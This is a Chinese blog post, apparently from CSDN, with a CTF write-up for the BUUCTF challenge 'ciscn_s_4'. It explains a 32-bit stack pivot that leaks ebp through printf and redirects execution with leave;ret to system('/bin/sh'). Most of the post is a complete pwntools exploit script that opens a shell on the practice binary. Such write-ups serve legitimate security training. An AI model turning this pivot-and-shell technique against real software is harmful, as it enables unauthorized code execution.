ciscn_s_4栈迁移

最新推荐文章于 2024-05-22 16:00:43 发布
最新推荐文章于 2024-05-22 16:00:43 发布
阅读量421 收藏 1
点赞数 1
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sea_time/article/details/106142971
版权

ciscn_s_4

一个栈迁移
在这里插入图片描述
程序有两个read函数和printf函数。
在这里插入图片描述
程序有system函数,但是函数执行的功能只是输出字符串flag,并不能读取到flag。
所以我们需要自己在构造一个system的参数。

我们可以通过vuln函数的read进行一处,但是只读取了0x30的大小,只能溢出8个字节,显然这是远远不够的。
所以需要利用栈迁移,也就是将ebp劫持到我们想要执行的函数地址上。

leave; =>
mov esp ebp
pop ebp
ret; =>
pop eip

这道题我们把栈迁移到s的位置,也就是我们读取数据的地方。
我们在vul函数出下个断点,gdb看一下
在这里插入图片描述
这里就是ebp的位置,首先我们要先泄露出ebp的值,然后根据偏移计算出s的地址。
继续调试,可以看到s的地址
在这里插入图片描述
那么buf也就是s与ebp的偏移:0xffffcf88-0xffffcf50=0x38

首先我们需要泄露ebp的值
我们看到程序使用的是printf函数,我们可以在第一个read的时候输入0x28大小的字符串,printf就会把字符串和ebp的值一同打印出来。

payload1='a'*0x28
io.send(payload1)
io.recvuntil('a'*0x28)
ebp=u32(io.recv(4).ljust(4,'\x00'))

那么我们就可以得到s的地址:fake_ebp=ebp-0x38

接下来我们利用第二个read,传入system的参数,控制程序流程。
首先是system_addr,我们伪造的ebp地址就在这,然后填充四个字符,用于system返回地址。
system是fake_ebp+12的位置,所以我们输入fake_ebp+12,再传入’/bin/sh’用于system的参数。
然后是fake_ebp-4,这是因为我们利用的是两个leave,但是第二个leave的pop ebp,在出栈的时候会esp+4。就会指向esp+4的位置,并非我们想要的地址。所以:

payload2=p32(system_addr)
payload2+='aaaa'
payload2+=p32(fake_ebp+12)
payload2+='/bin/sh\x00'
payload2=payload2.ljust(0x28,'A')
payload2+=p32(fake_ebp-4)
payload2+=p32(leave_ret)

完整exp:

from pwn import*
context(arch='amd64',os='linux',log_level='debug')

binary='./buffer'
elf=ELF(binary)
libc=elf.libc

io=process(binary)

system_addr=elf.sym['system']
leave_ret=0x080484B8

io.recvuntil("name?\n")
payload='a'*(0x28)
io.send(payload)

io.recvuntil('a'*0x28)
ebp=u32(io.recv(4).ljust(4,'\x00'))
print('ebp=>{}'.format(hex(ebp)))

fake_ebp=ebp-0x38
print('fake_ebp=>{}'.format(hex(fake_ebp)))

payload=p32(system_addr)
payload+='aaaa'
payload+=p32(fake_ebp+12)
payload+='/bin/sh\x00'
payload=payload.ljust(0x28,'A')
payload+=p32(fake_ebp-4)
payload+=p32(leave_ret)

io.sendline(payload)
io.interactive()
落殇子诚
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
迁移图解
qq_40410406的博客
11-11 1447
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
2023全国大学生信息安全竞赛(ciscn)初赛题解
热门推荐
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
2024CISCN 全国大学生信息安全竞赛创新实践赛MISC部分WP
最新发布
weixin_62467741的博客
05-22 906
最开始得到的是一个内存文件dmp和一个exe,猜测dmp对应的是找浏览器记录,exe对应的是c2地址,exe在虚拟机里运行一下得到的是一个.ss文件夹里面有loader.exe和一个png,png最上面有数据块,直接stegsolve过滤r全通道,savebin,得到类似于zip的文件。在ppt/embeddings文件夹下的docx中,从PPT打开的话就是第二章左上角那块黑色的,双击就行,打开后全选,改字体大小,改颜色,凯撒偏移量10解密,然后base64解密,得到part2。然后base64解码。
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2362
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
ciscn_2019_es_2【BUUCTF】
qq_41696518的博客
09-02 855
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1205
ciscn2023华中赛区pwn
D_coral.zip_coral loss_loss_迁移学习
07-14
deep coral loss在迁移学习中的领域自适应loss函数
source_妆容迁移_
09-29
【标题】"source_妆容迁移_" 描述的是一个利用深度学习技术实现的人脸妆容迁移系统。这个系统的核心功能是让用户的妆容能够根据示例图片进行转换,以达到与示例相似或更优的效果。它通过比对用户当前妆容与目标妆容...
a-alf_迁移方程_
10-02
《a-alf_迁移方程_》项目是一个专注于解决迁移扩散方程的计算程序,采用有限差分方法进行离散化处理。这个程序的核心在于其灵活性,允许用户根据实际问题调整参数,以适应不同的物理场景。 迁移方程是物理学、化学...
三重迁移学习代码和数据.rar_cottoniwz_三重迁移_三重迁移学习_迁移学习_迁移学习 数据
07-14
三重迁移学习代码以及数据,用于发现文本分类~~
rman_xttconvert_VER4.zip
05-23
总的来说,"rman_xttconvert_VER4.zip" 提供了一套完整的解决方案,帮助用户利用RMAN和XTT在Oracle数据库之间进行XML数据的迁移和备份。通过配置和执行这些脚本,管理员可以高效、安全地处理XML数据的存储和迁移任务...
ciscn_2019_es_2
小白垃圾笔记2
05-21 663
小白垃圾做题笔记,不及建议阅读。声明,exp来自网络,调试过程自己调试,对于题目的理解仅供参考。由于本人也是小白,且pwn全靠自己摸索,所以有很多理解不到位的地方。如有错误,欢迎指正。
ciscn_2019_s_4-迁移
个人笔记
06-07 669
思路:由于无直接getshell的利用函数,溢出空间只有8字节(ebp+ret占用无法继续填充ROP了),所以需要迁移更大的空间来构造ROP。迁移位置:执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此迁移到s[40]数组的位置,先通过第一次打印泄露s[40]的起始地址。迁移核心(通过ROPGadget寻找。ebp位置:迁移位置-4(32位)ret位置:leave_ret。题目类型猜测:溢出,迁移。作用:赋值执行函数调用。
ciscn_2019_s_4 [write up]
m0_73756460的博客
01-14 215
buuctf刷题 ciscn_2019_s_4 【write up】
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2289
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
CISCN 2021 题目复现
树木常青的博客
05-21 1526
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
ciscn_2019_es_2 迁移(很好的例子)
weixin_46521144的博客
07-17 1185
ciscn_2019_es_2 一道很好的迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。 题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露上地址用来给第二次做迁移使用,第二次执行迁移,控制ret跳转到我们所迁移上,执行上填写的exp。由于第二次依然是在函数帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也
CISCN(web篇)命令执行
cxiaodi的博客
05-05 825
ctf命令执行专题
[BUUCTF]-PWN:ciscn_2019_es_2解析(迁移
2301_79326813的博客
12-11 1226
答:先说明一点,我们第二次构造payload时往ebp填入ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输入ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填入ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过传参的,这样的形式是32位的调用函数的调用规则。
SAP S/4HANA 1909简化列表与系统迁移指南
该文档旨在提供SAP S/4HANA 1909首次发货时的简化清单,帮助用户理解新系统的主要特点、迁移过程以及与旧版本相比的废弃或更改功能。 1. **概述**: - **目的**: 文档的主要目的是概述SAP S/4HANA 1909简化清单,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值